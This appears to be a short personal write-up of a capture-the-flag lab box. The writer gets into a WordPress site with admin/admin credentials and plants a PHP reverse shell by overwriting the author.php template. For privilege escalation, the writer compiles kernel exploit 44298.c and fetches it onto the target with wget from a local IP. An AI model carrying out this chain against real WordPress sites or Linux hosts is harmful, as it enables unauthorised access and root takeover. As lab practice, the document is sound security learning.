This was my first intermediate box without reading the walkthrough for hints so I’m a little stoked.
I just leveraged all I learned on the beginner VMs and got through it in about 3 hours of mostly focused attention. (e.g., over breakfast and coffee.)
1. Scan revealed tcp/80
2. dirb revealed wordpress
3. wpscan revealed usernames with easily guessed passwords of admin/admin and with that I changed root’s (in wordpress only) to password
4. metasploit has a module for placing a php-reverse-shell.php.
!! This is good to know but for some reason it failed to authenticate using known good credentials. Will be useful for next time when I’m not sure where to put the reverse-php-shell.php.
5. msf> not authenticating with wordpress using msf> Username/pass/targetURI are correct but fails to authenticate.
6. Since I can edit templates on the wordpress as an admin, I edited author.php, replacing its contents with php-reverse-shell.php contents after adding my local ip/port. (Socket)
7. Refreshed the page and Success! Shell! Now escalate privs.
8. $cat /home/btrisk/local.txt for the first flag
8. Was checking for suid binaries but Linux ubuntu 4.4.0-62 is vulnerable to 44298.c (Searchsploit 4.4.0- to find it.) BTW, searchsploit searches exploit-db.com for exploits for whatever string you enter. Very useful.
9. It recommended exploit 44298.c, so copy it, run #gcc, stick in /var/www/html/sploit and call it with wget from remote host. (wget 192.168.111.44/sploit)
10. Chmod +x sploit and boom! Rootshell!
11. #cat /root/proof.txt for 2nd flag!